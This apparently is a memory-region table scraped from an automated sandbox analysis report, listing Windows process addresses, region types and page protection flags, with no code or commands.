|
heap
|
page read and write
|
||
1E8AD716000
|
trusted library allocation
|
page read and write
|
||
224B5605000
|
heap
|
page read and write
|
||
18C489FD000
|
heap
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
20724550000
|
heap
|
page read and write
|
||
207245BB000
|
heap
|
page read and write
|
||
3322A78000
|
stack
|
page read and write
|
||
17AF7290000
|
heap
|
page execute and read and write
|
||
17AF70A0000
|
heap
|
page execute and read and write
|
||
19F107E000
|
stack
|
page read and write
|
||
4149B4E000
|
stack
|
page read and write
|
||
2A71000
|
trusted library allocation
|
page read and write
|
||
7FFAACEEA000
|
trusted library allocation
|
page read and write
|
||
17A80001000
|
trusted library allocation
|
page read and write
|
||
17AF6EE0000
|
trusted library allocation
|
page read and write
|
||
207246F8000
|
heap
|
page read and write
|
||
7FFAACD68000
|
trusted library allocation
|
page read and write
|
||
18C48A12000
|
heap
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
1C439058000
|
heap
|
page read and write
|
||
18C48AC7000
|
heap
|
page read and write
|
||
17A8188F000
|
trusted library allocation
|
page read and write
|
||
224B5820000
|
heap
|
page read and write
|
||
2249B700000
|
heap
|
page read and write
|
||
18C46B5E000
|
heap
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
1E8B585A000
|
heap
|
page read and write
|
||
7FFB23AE0000
|
unkown
|
page readonly
|
||
18C48A2C000
|
heap
|
page read and write
|
||
1CC75000
|
heap
|
page read and write
|
||
18C489F9000
|
heap
|
page read and write
|
||
1C57B000
|
stack
|
page read and write
|
||
1E89B885000
|
heap
|
page read and write
|
||
4148D7D000
|
stack
|
page read and write
|
||
207245B6000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
17A812AA000
|
trusted library allocation
|
page read and write
|
||
1D916FE000
|
unkown
|
page readonly
|
||
1C4390C1000
|
heap
|
page read and write
|
||
1B3CF000
|
stack
|
page read and write
|
||
17AF5500000
|
heap
|
page read and write
|
||
18C48AF6000
|
heap
|
page read and write
|
||
207246F0000
|
heap
|
page read and write
|
||
1C439104000
|
heap
|
page read and write
|
||
20722592000
|
heap
|
page read and write
|
||
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
1661C3F5000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
17A81030000
|
trusted library allocation
|
page read and write
|
||
1E8AD70F000
|
trusted library allocation
|
page read and write
|
||
20724574000
|
heap
|
page read and write
|
||
1E8B5AC6000
|
heap
|
page read and write
|
||
1E89EC8B000
|
trusted library allocation
|
page read and write
|
||
1C437CC1000
|
heap
|
page read and write
|
||
1CC9C000
|
heap
|
page read and write
|
||
224B55DD000
|
heap
|
page read and write
|
||
7FFAACD50000
|
trusted library allocation
|
page execute and read and write
|
||
1E8B5809000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
7FFAACEF3000
|
trusted library allocation
|
page read and write
|
||
18C46AFE000
|
heap
|
page read and write
|
||
207245B6000
|
heap
|
page read and write
|
||
E7ACB8E000
|
stack
|
page read and write
|
||
1E8AD796000
|
trusted library allocation
|
page read and write
|
||
207246FF000
|
heap
|
page read and write
|
||
1662DFC1000
|
trusted library allocation
|
page read and write
|
||
7FFAACBDC000
|
trusted library allocation
|
page execute and read and write
|
||
2249D26A000
|
trusted library allocation
|
page read and write
|
||
7FFAACB84000
|
trusted library allocation
|
page read and write
|
||
16636470000
|
heap
|
page read and write
|
||
7FFAACBD0000
|
trusted library allocation
|
page read and write
|
||
18C48AE1000
|
heap
|
page read and write
|
||
7FFAACD22000
|
trusted library allocation
|
page read and write
|
||
7FFAACEEC000
|
trusted library allocation
|
page read and write
|
||
1C438C20000
|
trusted library section
|
page readonly
|
||
1E8B5760000
|
heap
|
page read and write
|
||
20724689000
|
heap
|
page read and write
|
||
1E89F224000
|
trusted library allocation
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
207224F0000
|
heap
|
page read and write
|
||
1C43D260000
|
trusted library allocation
|
page read and write
|
||
17AF7130000
|
heap
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
18C489FC000
|
heap
|
page read and write
|
||
17AF787E000
|
heap
|
page read and write
|
||
18C48B80000
|
heap
|
page read and write
|
||
18C48AE9000
|
heap
|
page read and write
|
||
16636642000
|
heap
|
page read and write
|
||
7FFAACFBA000
|
trusted library allocation
|
page read and write
|
||
2249E344000
|
trusted library allocation
|
page read and write
|
||
7FFAACDB2000
|
trusted library allocation
|
page read and write
|
||
18C48A00000
|
heap
|
page read and write
|
||
1E8B59EB000
|
heap
|
page read and write
|
||
207225A7000
|
heap
|
page read and write
|
||
17A902F2000
|
trusted library allocation
|
page read and write
|
||
1D9267E000
|
stack
|
page read and write
|
||
18C48A13000
|
heap
|
page read and write
|
||
7FFAACC96000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACD3A000
|
trusted library allocation
|
page read and write
|
||
F4A000
|
heap
|
page read and write
|
||
18C48B87000
|
heap
|
page read and write
|
||
207246F8000
|
heap
|
page read and write
|
||
224B578A000
|
heap
|
page read and write
|
||
1E8B5960000
|
heap
|
page read and write
|
||
207245C6000
|
heap
|
page read and write
|
||
1B68D000
|
stack
|
page read and write
|
||
2072469C000
|
heap
|
page read and write
|
||
18C48A12000
|
heap
|
page read and write
|
||
18C48A0A000
|
heap
|
page read and write
|
||
18C46AD2000
|
heap
|
page read and write
|
||
1C095000
|
stack
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
20728BA4000
|
heap
|
page read and write
|
||
7FFAACBC3000
|
trusted library allocation
|
page execute and read and write
|
||
17AF6E70000
|
trusted library allocation
|
page read and write
|
||
1661FD6F000
|
trusted library allocation
|
page read and write
|
||
207245BE000
|
heap
|
page read and write
|
||
B70000
|
heap
|
page read and write
|
||
1B6F3000
|
heap
|
page read and write
|
||
18C48A00000
|
heap
|
page read and write
|
||
7FFAACBBD000
|
trusted library allocation
|
page execute and read and write
|
||
F62000
|
heap
|
page read and write
|
||
4148C7E000
|
stack
|
page read and write
|
||
B60000
|
heap
|
page read and write
|
||
7FFAACE90000
|
trusted library allocation
|
page read and write
|
||
D8F000
|
stack
|
page read and write
|
||
18C48B36000
|
heap
|
page read and write
|
||
18C48B6F000
|
heap
|
page read and write
|
||
1E89B6AC000
|
heap
|
page read and write
|
||
207245BE000
|
heap
|
page read and write
|
||
1E89ECB1000
|
trusted library allocation
|
page read and write
|
||
18C489EF000
|
heap
|
page read and write
|
||
1C43D270000
|
trusted library allocation
|
page read and write
|
||
7FFAACC66000
|
trusted library allocation
|
page execute and read and write
|
||
E7ACA8E000
|
stack
|
page read and write
|
||
207246F1000
|
heap
|
page read and write
|
||
19F0CB3000
|
stack
|
page read and write
|
||
7FFAACB83000
|
trusted library allocation
|
page execute and read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
18C46AFB000
|
heap
|
page read and write
|
||
F20000
|
heap
|
page read and write
|
||
18C48B2C000
|
heap
|
page read and write
|
||
20728BA8000
|
heap
|
page read and write
|
||
7FFAACBAD000
|
trusted library allocation
|
page execute and read and write
|
||
1E8AD72D000
|
trusted library allocation
|
page read and write
|
||
207245B2000
|
heap
|
page read and write
|
||
BFE000
|
heap
|
page read and write
|
||
207245BB000
|
heap
|
page read and write
|
||
18C48A24000
|
heap
|
page read and write
|
||
1E89B6AA000
|
heap
|
page read and write
|
||
7FFAACD80000
|
trusted library allocation
|
page execute and read and write
|
||
19F22CC000
|
stack
|
page read and write
|
||
17AF71E1000
|
heap
|
page read and write
|
||
4148E76000
|
stack
|
page read and write
|
||
17A81783000
|
trusted library allocation
|
page read and write
|
||
7FFAACF20000
|
trusted library allocation
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
224B57E1000
|
heap
|
page read and write
|
||
207245BA000
|
heap
|
page read and write
|
||
18C48BA3000
|
heap
|
page read and write
|
||
7FFAACEF3000
|
trusted library allocation
|
page read and write
|
||
20724561000
|
heap
|
page read and write
|
||
7FFAACB80000
|
trusted library allocation
|
page read and write
|
||
207245BA000
|
heap
|
page read and write
|
||
7FFAACD40000
|
trusted library allocation
|
page execute and read and write
|
||
17A80DCC000
|
trusted library allocation
|
page read and write
|
||
18C489EF000
|
heap
|
page read and write
|
||
7FFAACBC4000
|
trusted library allocation
|
page read and write
|
||
18C4B218000
|
heap
|
page read and write
|
||
18C4AC10000
|
trusted library allocation
|
page read and write
|
||
1D930FE000
|
unkown
|
page readonly
|
||
2871000
|
trusted library allocation
|
page read and write
|
||
18C48A06000
|
heap
|
page read and write
|
||
18C48A28000
|
heap
|
page read and write
|
||
20724682000
|
heap
|
page read and write
|
||
1E89EBA5000
|
trusted library allocation
|
page read and write
|
||
18C4B218000
|
heap
|
page read and write
|
||
1C439092000
|
heap
|
page read and write
|
||
1D924FE000
|
unkown
|
page readonly
|
||
2072467B000
|
heap
|
page read and write
|
||
1D9237E000
|
stack
|
page read and write
|
||
1E89B8D0000
|
trusted library allocation
|
page read and write
|
||
18C48AEF000
|
heap
|
page read and write
|
||
414907F000
|
stack
|
page read and write
|
||
1661F7BB000
|
trusted library allocation
|
page read and write
|
||
207267A0000
|
trusted library allocation
|
page read and write
|
||
12CD2000
|
trusted library allocation
|
page read and write
|
||
1661F29A000
|
trusted library allocation
|
page read and write
|
||
332230E000
|
stack
|
page read and write
|
||
2072458B000
|
heap
|
page read and write
|
||
F00000
|
trusted library allocation
|
page read and write
|
||
7FFAACE91000
|
trusted library allocation
|
page read and write
|
||
18C48B9E000
|
heap
|
page read and write
|
||
7DF462D10000
|
trusted library allocation
|
page execute and read and write
|
||
18C48A00000
|
heap
|
page read and write
|
||
207245B6000
|
heap
|
page read and write
|
||
7FFAACEC0000
|
trusted library allocation
|
page read and write
|
||
1CB6E000
|
stack
|
page read and write
|
||
19F13F6000
|
stack
|
page read and write
|
||
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
3322977000
|
stack
|
page read and write
|
||
17A810BF000
|
trusted library allocation
|
page read and write
|
||
224B55E6000
|
heap
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
18C48AF1000
|
heap
|
page read and write
|
||
1C2DE000
|
stack
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
7FFAAD016000
|
trusted library allocation
|
page read and write
|
||
18C48AE3000
|
heap
|
page read and write
|
||
332287E000
|
stack
|
page read and write
|
||
17AF6F37000
|
heap
|
page execute and read and write
|
||
F8F000
|
heap
|
page read and write
|
||
1D928FE000
|
unkown
|
page readonly
|
||
25EDBFD000
|
stack
|
page read and write
|
||
18C489E6000
|
heap
|
page read and write
|
||
20723FDB000
|
heap
|
page read and write
|
||
1E89E38C000
|
trusted library allocation
|
page read and write
|
||
7FFAAD000000
|
trusted library allocation
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
1C437D02000
|
heap
|
page read and write
|
||
18C489FC000
|
heap
|
page read and write
|
||
1C43D360000
|
trusted library allocation
|
page read and write
|
||
7FFAACF7A000
|
trusted library allocation
|
page read and write
|
||
1E89B890000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
7FFAACD62000
|
trusted library allocation
|
page read and write
|
||
207245B1000
|
heap
|
page read and write
|
||
1C438C60000
|
trusted library section
|
page readonly
|
||
2249D020000
|
heap
|
page read and write
|
||
17AF5502000
|
heap
|
page read and write
|
||
18C48B2C000
|
heap
|
page read and write
|
||
7FFAACB83000
|
trusted library allocation
|
page execute and read and write
|
||
17AF5410000
|
heap
|
page read and write
|
||
20723F90000
|
heap
|
page read and write
|
||
18C46970000
|
heap
|
page read and write
|
||
7FFB22779000
|
unkown
|
page readonly
|
||
207245B6000
|
heap
|
page read and write
|
||
1661E45E000
|
trusted library allocation
|
page read and write
|
||
12CC1000
|
trusted library allocation
|
page read and write
|
||
2072471D000
|
heap
|
page read and write
|
||
207225E8000
|
heap
|
page read and write
|
||
20724589000
|
heap
|
page read and write
|
||
7FFAACE7F000
|
trusted library allocation
|
page read and write
|
||
20724676000
|
heap
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
4148DF8000
|
stack
|
page read and write
|
||
7FFB1E3C0000
|
unkown
|
page read and write
|
||
7FFAACFE0000
|
trusted library allocation
|
page read and write
|
||
1661C2B0000
|
heap
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
17AF71BF000
|
heap
|
page read and write
|
||
33238CE000
|
stack
|
page read and write
|
||
1E8B57B5000
|
heap
|
page read and write
|
||
7FFAACC0C000
|
trusted library allocation
|
page execute and read and write
|
||
1661F16C000
|
trusted library allocation
|
page read and write
|
||
17A810F5000
|
trusted library allocation
|
page read and write
|
||
18C489E7000
|
heap
|
page read and write
|
||
1D91DFE000
|
unkown
|
page readonly
|
||
2072457F000
|
heap
|
page read and write
|
||
207246FC000
|
heap
|
page read and write
|
||
207245BA000
|
heap
|
page read and write
|
||
7FFAACCA0000
|
trusted library allocation
|
page execute and read and write
|
||
2249D030000
|
heap
|
page read and write
|
||
2249E932000
|
trusted library allocation
|
page read and write
|
||
B8D000
|
heap
|
page read and write
|
||
207225E9000
|
heap
|
page read and write
|
||
18C46B2E000
|
heap
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
18C48AC0000
|
heap
|
page read and write
|
||
1C437C00000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
20724731000
|
heap
|
page read and write
|
||
1D36B000
|
stack
|
page read and write
|
||
1E89E383000
|
trusted library allocation
|
page read and write
|
||
1663672C000
|
heap
|
page read and write
|
||
18C46B36000
|
heap
|
page read and write
|
||
18C489F8000
|
heap
|
page read and write
|
||
7FFB22780000
|
unkown
|
page read and write
|
||
20728EA2000
|
trusted library allocation
|
page read and write
|
||
224B5901000
|
heap
|
page read and write
|
||
2249E198000
|
trusted library allocation
|
page read and write
|
||
B20000
|
heap
|
page read and write
|
||
1BB9E000
|
stack
|
page read and write
|
||
7FFAAD00F000
|
trusted library allocation
|
page read and write
|
||
18C46B02000
|
heap
|
page read and write
|
||
25ED97D000
|
stack
|
page read and write
|
||
2072457E000
|
heap
|
page read and write
|
||
1C438601000
|
trusted library allocation
|
page read and write
|
||
224B5626000
|
heap
|
page read and write
|
||
18C48A2C000
|
heap
|
page read and write
|
||
2580000
|
trusted library allocation
|
page read and write
|
||
20724583000
|
heap
|
page read and write
|
||
1E8AD71D000
|
trusted library allocation
|
page read and write
|
||
18C48A13000
|
heap
|
page read and write
|
||
1C439065000
|
heap
|
page read and write
|
||
207246C5000
|
heap
|
page read and write
|
||
18C489E4000
|
heap
|
page read and write
|
||
7FFAACE6F000
|
trusted library allocation
|
page read and write
|
||
18C48A28000
|
heap
|
page read and write
|
||
1E8B5792000
|
heap
|
page read and write
|
||
18C46B06000
|
heap
|
page read and write
|
||
7FFAACEF0000
|
trusted library allocation
|
page read and write
|
||
E90000
|
heap
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
18C4B510000
|
heap
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
2249E06E000
|
trusted library allocation
|
page read and write
|
||
1C43D300000
|
trusted library allocation
|
page read and write
|
||
20724682000
|
heap
|
page read and write
|
||
1D923FE000
|
unkown
|
page readonly
|
||
7FFAACFB0000
|
trusted library allocation
|
page execute and read and write
|
||
18C46ADB000
|
heap
|
page read and write
|
||
18C48A28000
|
heap
|
page read and write
|
||
7FFAACB94000
|
trusted library allocation
|
page read and write
|
||
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
7FFAACD3A000
|
trusted library allocation
|
page read and write
|
||
16636440000
|
heap
|
page execute and read and write
|
||
17AF6E60000
|
heap
|
page readonly
|
||
7FFAACD31000
|
trusted library allocation
|
page read and write
|
||
7FFAACB9B000
|
trusted library allocation
|
page read and write
|
||
2249DFB5000
|
trusted library allocation
|
page read and write
|
||
207245B2000
|
heap
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
224B5857000
|
heap
|
page read and write
|
||
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
18C48A09000
|
heap
|
page read and write
|
||
19F157E000
|
stack
|
page read and write
|
||
B11000
|
stack
|
page read and write
|
||
207246DB000
|
heap
|
page read and write
|
||
18C48A0E000
|
heap
|
page read and write
|
||
1E89B754000
|
heap
|
page read and write
|
||
4148BFA000
|
stack
|
page read and write
|
||
1D92CFE000
|
unkown
|
page readonly
|
||
7FFAACF8E000
|
trusted library allocation
|
page read and write
|
||
7FFAACB9D000
|
trusted library allocation
|
page execute and read and write
|
||
207246FC000
|
heap
|
page read and write
|
||
20724689000
|
heap
|
page read and write
|
||
1E89B900000
|
heap
|
page readonly
|
||
B2C000
|
heap
|
page read and write
|
||
18C48B6F000
|
heap
|
page read and write
|
||
1E8B59C9000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
2249DECB000
|
trusted library allocation
|
page read and write
|
||
20724596000
|
heap
|
page read and write
|
||
7FFAACBB4000
|
trusted library allocation
|
page read and write
|
||
224B5910000
|
heap
|
page read and write
|
||
1E89B6A6000
|
heap
|
page read and write
|
||
18C489EF000
|
heap
|
page read and write
|
||
2249B5E5000
|
heap
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
7FFAACFA6000
|
trusted library allocation
|
page read and write
|
||
7FFAACB84000
|
trusted library allocation
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
207245B6000
|
heap
|
page read and write
|
||
7FFAACC1C000
|
trusted library allocation
|
page execute and read and write
|
||
18C48A24000
|
heap
|
page read and write
|
||
20722593000
|
heap
|
page read and write
|
||
7FFAACB84000
|
trusted library allocation
|
page read and write
|
||
18C48A13000
|
heap
|
page read and write
|
||
1410000
|
heap
|
page read and write
|
||
2249B585000
|
heap
|
page read and write
|
||
20724575000
|
heap
|
page read and write
|
||
18C46ADC000
|
heap
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
18C48A01000
|
heap
|
page read and write
|
||
1661FD94000
|
trusted library allocation
|
page read and write
|
||
207245AE000
|
heap
|
page read and write
|
||
18C489F5000
|
heap
|
page read and write
|
||
7FFAACDA8000
|
trusted library allocation
|
page read and write
|
||
2870000
|
heap
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
7DF4588D0000
|
trusted library allocation
|
page execute and read and write
|
||
1D926FE000
|
unkown
|
page readonly
|
||
16636349000
|
heap
|
page read and write
|
||
18C46B29000
|
heap
|
page read and write
|
||
7FFAACBBB000
|
trusted library allocation
|
page execute and read and write
|
||
18C48B64000
|
heap
|
page read and write
|
||
207245B6000
|
heap
|
page read and write
|
There are 1890 hidden memdumps, click here to show them.